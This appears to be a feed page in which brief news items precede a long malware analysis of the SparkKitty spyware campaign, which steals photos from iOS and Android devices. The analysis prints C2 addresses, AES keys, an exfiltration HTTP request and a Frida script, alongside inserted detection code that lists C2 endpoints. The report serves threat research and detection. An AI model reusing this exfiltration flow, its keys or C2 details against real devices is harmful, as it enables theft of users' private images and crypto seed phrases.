IAEA says extent of damage at Fordow still unknown
https://www.aljazeera.com/video/newsfeed/2025/6/23/iaea-says-extent-of-damage-at-fordow-still-unknown?utm_source=flipboard&utm_medium=activitypub
Posted into Middle East News @middle-east-news-AlJazeera
The head of the UN’s nuclear watchdog the IAEA Rafael Grossi has warned that the global non-proliferation regime
Al Jazeera
Trump Appoints 22-Year-Old Ex-Gardener and Grocery Store Assistant to Lead U.S. Terror Prevention
thedailybeast.com/donald-trump…
#USA #UsPol #Trump #Terrorism #Biden #Politics
Counter-terror chief was pulling up weeds just five years ago.
Tom Latchem (The Daily Beast)
Ufficio Zero Linux OS EDUcational - system installation
We thank @LorenzoDM, founding member of Boost Media APS, for producing the video tutorial on installing the EDU release for Italian schools of every level of education.
If you believe in Open Source, you can join Boost Media APS via this link boostmedia.it/it/iscrizione and help us on the front line as a member to spread Open technology in Italy.
Membership | Boost Media APS
Social promotion association for Ufficio Zero Linux OS and Italian and European open source software
boostmedia.it
US strikes on Iran trigger protests internationally
https://www.bbc.com/news/videos/c4g2wxwel5qo?utm_source=flipboard&utm_medium=activitypub
Posted into World @world-BBCNews
Demonstrators take to the streets in France, Pakistan, Greece and the Philippines to condemn the military action.
www.bbc.com
Sky News: Israel Denies Gaza Access to International Journalists to Restrict Scrutiny and Accountability
London (Quds News Network)- Israel’s continued prevention of international journalists from entering Gaza appears to be motivated less by concerns for their safety and more by a desire to avoid proper
Editing Team (Quds News Network)
Professor Manera of ETH explains: “Enrichment facilities were hit, containing mostly chemical substances, which pose more of a toxicity problem”
rsi.ch/s/2925699
freezonemagazine.com/articoli/…
This is a unique novel, in its gestation, its vicissitudes, its writing and the character of its author. Nicola Pugliese claimed to have written it in forty-five days, almost
Opening event imminent for North Korea’s Wonsan Kalma mega beach resort: Imagery | NK PRO
North Korea’s gigantic — and problematic — Wonsan Kalma beach resort is about to finally open with a major ceremony likely attended by leader Kim Jong Un, according to NK Pro analysis of satellite imagery, almost eight years after construction began …
NK PRO
Visual Code Generator to End All Generators
QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. With “yet-another-web-app”, Barcode Tool – Generator & Scanner, created by [Ricardo de Azambuja], you can put those worries to rest.
When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.
If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.
SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play
In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.
Here are the key facts about this new threat:
- The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
- On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
- The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
- While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
- The campaign has been active since at least February 2024.
It all began with a suspicious online store…
During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.
{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}
The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.
Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.
<div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}
iOS app delivery method
And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.
As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.
Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>
<key>DER-Encoded-Profile</key>
<data>OMITTED</data>
<key>Entitlements</key>
<dict>
<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>
<key>get-task-allow</key>
<false/>
<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>
</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist>
Example of a provisioning profile installed to run a malicious TikTok mod
In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:
<key>ProvisionsAllDevices</key>
<true/>
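As a triage aid for the profile shown above, the following added example (not code from the original report) extracts the plist from a .mobileprovision blob and classifies it by its device-scoping keys. The function names and the wrapper bytes around the sample are constructed for illustration; the plist fields are trimmed from the profile on this page, and the signature is not verified.

```python
import plistlib
from datetime import datetime, timezone

PLIST_START, PLIST_END = b"<?xml", b"</plist>"


def extract_profile_plist(blob):
    """Return the plist dict embedded in a .mobileprovision blob.

    The file is a CMS (PKCS#7) container with the XML plist stored in the
    clear, so a marker search is enough for triage. No signature check here.
    """
    start = blob.find(PLIST_START)
    end = blob.find(PLIST_END, start)
    if start < 0 or end < 0:
        raise ValueError("no embedded XML plist found")
    return plistlib.loads(blob[start:end + len(PLIST_END)])


def classify_profile(profile):
    """Map the profile's device-scoping keys to a distribution type."""
    if profile.get("ProvisionsAllDevices") is True:
        return "enterprise"  # the key the report points at
    if "ProvisionedDevices" in profile:
        debuggable = profile.get("Entitlements", {}).get("get-task-allow", False)
        return "development" if debuggable else "ad-hoc"
    return "app-store"


def triage(blob, now=None):
    """Summarise the fields to check first on a sideloaded app's profile."""
    profile = extract_profile_plist(blob)
    # plistlib yields naive datetimes expressed in UTC, so compare like with like.
    now = now or datetime.now(timezone.utc).replace(tzinfo=None)
    entitlements = profile.get("Entitlements", {})
    expires = profile.get("ExpirationDate")
    kind = classify_profile(profile)
    return {
        "kind": kind,
        "team_name": profile.get("TeamName"),
        "team_id": (profile.get("TeamIdentifier") or [None])[0],
        "app_id": entitlements.get("application-identifier"),
        "expires": expires,
        "expired": expires is not None and expires < now,
        # An enterprise-signed app on a device that the named organisation
        # does not manage is the situation described in the text.
        "needs_review": kind == "enterprise",
    }


# Plist fields trimmed from the profile on this page; the bytes before and
# after it are constructed stand-ins for the CMS wrapper.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>AppIDName</key><string>rdcUniApp</string>
  <key>Entitlements</key>
  <dict>
    <key>application-identifier</key>
    <string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
    <key>get-task-allow</key><false/>
  </dict>
  <key>ExpirationDate</key><date>2026-01-20T06:59:55Z</date>
  <key>ProvisionsAllDevices</key><true/>
  <key>TeamIdentifier</key><array><string>EHQ3N2D5WH</string></array>
  <key>TeamName</key><string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
</dict>
</plist>"""
SAMPLE_BLOB = b"\x30\x82constructed-header" + SAMPLE_PLIST + b"constructed-trailer"

if __name__ == "__main__":
    for key, value in triage(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```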
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:
Looking for copper, found gold
Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.
Suspicious store opened inside a TikTok app
It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.
The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.
The malicious payload functions as follows:
- It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
- It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
- The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
- The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON: {"msg":"success","code":0,"status":"1"}. The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.
- Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.
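The static markers named so far (the ccool gate value, the ccc key in a framework’s Info.plist, the added AFImageDownloaderTool class) and the photo-library import in the disguised dylibs described later in the report can be checked in an IPA without running it. The scanner below is an added example, not code from the original report; the finding labels, the sample bundle layout and the placeholder ccc value are constructed for illustration.

```python
import io
import plistlib
import re
import zipfile

CCOOL_VALUE = "77e1a4d360e17fdbc"                      # gate value from the report
TROJANISED_FRAMEWORKS = {"AFNetworking", "Alamofire"}  # names the payload hides behind
SUSPECT_DYLIBS = {"wc.dylib", "libswiftDarwin.dylib"}

APP = r"^Payload/[^/]+\.app/"
MAIN_PLIST = re.compile(APP + r"Info\.plist$")
FW_FILE = re.compile(APP + r"Frameworks/([^/]+)\.framework/([^/]+)$")
DYLIB = re.compile(APP + r"(?:.*/)?([^/]+\.dylib)$")


def _plist(data):
    """Parse an XML or binary plist; a malformed one yields no keys."""
    try:
        return plistlib.loads(data)
    except Exception:
        return {}


def scan_ipa(ipa_bytes):
    """Return (finding, path) pairs for the markers described in the text."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as ipa:
        for name in ipa.namelist():
            fw, dylib = FW_FILE.match(name), DYLIB.match(name)
            if MAIN_PLIST.match(name):
                if _plist(ipa.read(name)).get("ccool") == CCOOL_VALUE:
                    findings.append(("ccool-gate", name))
            elif fw and fw.group(1) in TROJANISED_FRAMEWORKS:
                if fw.group(2) == "Info.plist":
                    if _plist(ipa.read(name)).get("ccc"):
                        findings.append(("ccc-config", name))
                elif fw.group(2) == fw.group(1):
                    # Framework executable: the class is absent upstream.
                    if b"AFImageDownloaderTool" in ipa.read(name):
                        findings.append(("added-class", name))
            elif dylib and dylib.group(1) in SUSPECT_DYLIBS:
                # libswiftDarwin.dylib is also a legitimate file name, so the
                # name only counts together with photo-library access.
                if b"PHPhotoLibrary" in ipa.read(name):
                    findings.append(("dylib-photo-access", name))
    return findings


def build_sample_ipa(infected=True):
    """Constructed IPA: identical layout with and without the markers."""
    main = {"CFBundleIdentifier": "com.example.demo"}
    fw_plist = {"CFBundleName": "AFNetworking"}
    fw_bin = b"\xcf\xfa\xed\xfe AFImageDownloader"
    dylib = b"\xcf\xfa\xed\xfe swift runtime"
    if infected:
        main["ccool"] = CCOOL_VALUE
        fw_plist["ccc"] = "Q09OU1RSVUNURUQ="   # placeholder, not real ciphertext
        fw_bin += b" AFImageDownloaderTool"
        dylib += b" PHPhotoLibrary"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        root = "Payload/Demo.app/"
        fw_dir = root + "Frameworks/AFNetworking.framework/"
        z.writestr(root + "Info.plist", plistlib.dumps(main))
        z.writestr(fw_dir + "Info.plist", plistlib.dumps(fw_plist))
        z.writestr(fw_dir + "AFNetworking", fw_bin)
        z.writestr(root + "Frameworks/libswiftDarwin.dylib", dylib)
    return buf.getvalue()


if __name__ == "__main__":
    for finding, path in scan_ipa(build_sample_ipa(infected=True)):
        print(f"{finding:20} {path}")
    print("clean bundle findings:", scan_ipa(build_sample_ipa(infected=False)))
```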
Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.
PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......
Digging deeper
When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.
The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.
Uploading image and device information
Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:
- The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.
Procedure for obtaining C2 addresses
- Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.
Finding the shortest response time
- The code uses custom names for classes, methods, and fields.
- It is written in Kotlin. Other versions we found were written in Java.
Spyware in official app stores
One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.
Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.
Infected app page on the App Store
In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.
Checking the server response and sending a photo
{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};
Sample server response
In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.
Suspicious libcrypto.dylib mod
During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.
Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.
Section of obfuscated code for loading the malicious URL
Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:
// Module map is built lazily on the first traced call.
var moduleMap = null;

function traceModule(impl, name)
{
    console.log("Tracing " + name, impl);
    Interceptor.attach(impl, {
        onEnter: function(args) {
            var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
            if (!moduleMap) {
                moduleMap = new ModuleMap();
            }
            var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
            // we want to trace only calls originating from malware dylib
            if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
                // per-invocation flag, so onLeave logs only the calls traced here
                this.traced = true;
                console.warn("\n*** entering " + name);
                if (name.includes('objc_msgSend')) {
                    // x1 holds the selector, x2 the first argument
                    var sel = this.context.x1.readUtf8String();
                    if (sel.includes("stringWithCString:")) {
                        var s = this.context.x2.readUtf8String();
                        if (s.includes('.cn-bj.ufileos.com')) {
                            // swap the dead configuration URL for a working one
                            console.log("Replacing URL: ", s);
                            var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
                            this.context.x2 = news;
                            console.log("New URL: ", this.context.x2.readUtf8String());
                        }
                        else
                            console.log(s);
                    }
                }
                // print backtrace
                console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
            }
        },
        onLeave: function(retval) {
            if (this.traced) {
                console.warn("\n*** leaving ", name);
                console.log(this.context.x0.readByteArray(64));
            }
        }
    });
}

var malInited = false;
var malFunc;
function callMalware() {
    if (!malInited) {
        // wrap the function under analysis and hook objc_msgSend once
        malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
        traceModule(base.add(0x821360), 'objc_msgSend');
        malInited = true;
    }
    malFunc();
}

var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log('Base address: ', base);
// go through callMalware() so the hook is installed before the function runs
callMalware();
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.
*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)
### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
*** leaving objc_msgSend
### Server response in bytes
00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.
The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address is encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.
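The check-in and upload endpoints described in this report (/api/getImageStatus and /api/putImages for the iOS framework, /api/anheartbeat and /api/putDataInfo on Android, /api/getStatus with buid, appname and userId for the obfuscated library) give a proxy-log detection that also notes when an upload follows a check-in to the same server. This is an added example, not code from the original report; the four-field log format, rule names and all sample lines are constructed, with documentation-range addresses standing in for real hosts.

```python
from urllib.parse import parse_qs, urlsplit

# (rule name, method, path, required query keys, role). Paths come from the
# report; path-only rules can collide with unrelated APIs, so treat a lone
# check-in as a lead rather than a verdict.
RULES = [
    ("ios-framework-checkin", "GET", "/api/getImageStatus", (), "checkin"),
    ("ios-framework-upload", "PUT", "/api/putImages", (), "upload"),
    ("android-checkin", "GET", "/api/anheartbeat", (), "checkin"),
    ("android-upload", "PUT", "/api/putDataInfo", (), "upload"),
    ("ios-dylib-checkin", "GET", "/api/getStatus",
     ("buid", "appname", "userId"), "checkin"),
]


def match_request(method, url):
    """Return (rule, role) for a request matching a known endpoint, else None."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    for name, rule_method, path, keys, role in RULES:
        if (method.upper() == rule_method and parts.path == path
                and all(k in query for k in keys)):
            return name, role
    return None


def scan(lines):
    """Scan 'timestamp client method url' lines and correlate per client/server."""
    checked_in = set()  # (client, server) pairs that already sent a check-in
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # not in the assumed format
        timestamp, client, method, url = fields
        matched = match_request(method, url)
        if matched is None:
            continue
        rule, role = matched
        pair = (client, urlsplit(url).netloc)
        if role == "checkin":
            checked_in.add(pair)
        hits.append({
            "time": timestamp,
            "client": client,
            "server": pair[1],
            "rule": rule,
            "severity": "high" if role == "upload" else "medium",
            # For uploads: did this client check in with this server first?
            "after_checkin": pair in checked_in if role == "upload" else None,
        })
    return hits


# Constructed sample log (not captured traffic).
SAMPLE_LOG = [
    "2025-06-23T10:00:01Z 10.0.0.5 GET http://198.51.100.7:7777/api/getImageStatus?appname=Demo&uuid=constructed",
    "2025-06-23T10:00:09Z 10.0.0.5 PUT http://198.51.100.7:7777/api/putImages",
    "2025-06-23T10:01:00Z 10.0.0.9 GET https://status.example.org/api/getStatus",
    "2025-06-23T10:01:30Z 10.0.0.9 GET http://192.0.2.44:8081/api/getStatus?buid=com.example.app&appname=Demo&userId=constructed",
    "2025-06-23T10:02:00Z 10.0.0.12 PUT http://203.0.113.20/api/putDataInfo",
    "2025-06-23T10:02:05Z 10.0.0.12 GET https://www.example.com/index.html",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```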
Another activity cluster?
During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.
Scam platform account on YouTube
Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.
Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.
Code snippet for photo uploads
We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:
- The malicious apps also focus on cryptocurrency themes.
- Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
- The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.
Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.
Campaign goals and targets
Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:
- A crypto-only store was embedded within the TikTok app alongside the spyware.
- Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
